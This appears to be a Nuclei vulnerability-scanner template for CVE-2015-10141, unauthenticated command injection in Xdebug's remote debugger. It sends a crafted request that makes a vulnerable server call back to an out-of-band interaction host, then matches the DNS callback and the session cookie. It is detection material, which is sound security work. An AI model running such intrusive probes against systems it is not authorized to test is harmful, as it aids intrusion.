id: CVE-2015-10141

info:
  name: Xdebug <= 2.5.5 - Command Injection
  author: pwnhxl
  severity: critical
  description: |
    Xdebug <= 2.5.5 contains an unauthenticated command injection: when remote debugging is enabled, the debugger accepts debugger protocol commands without authentication, letting remote attackers execute arbitrary PHP code and system commands. Exploitation requires remote debugging to be enabled.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
    - https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
    - https://paper.seebug.org/397/
    - https://github.com/D3Ext/XDEBUG-Exploit
    - https://www.exploit-db.com/exploits/44568
    - https://www.vulncheck.com/advisories/xdebug-remote-debugger-unauth-os-command-execution
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cve-id: CVE-2015-10141
    cwe-id: CWE-78
    epss-score: 0.74887
    epss-percentile: 0.98801
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2015,oast,rce,vulhub,php,debug,xdebug,intrusive,vuln

http:
  - raw:
      - |
        GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: {{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: header
        words:
          - 'Set-Cookie: XDEBUG_SESSION={{randstr}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d047c248b08cbc655c3949a091ca7023892b9c1afaa5b64c2a528f5245b1837c022059dbfb7fd607432fb988d103a8cb05795a88cfd2b7caf7d1c515ebab48f48140:922c64590222798bb761d5b6d8e72950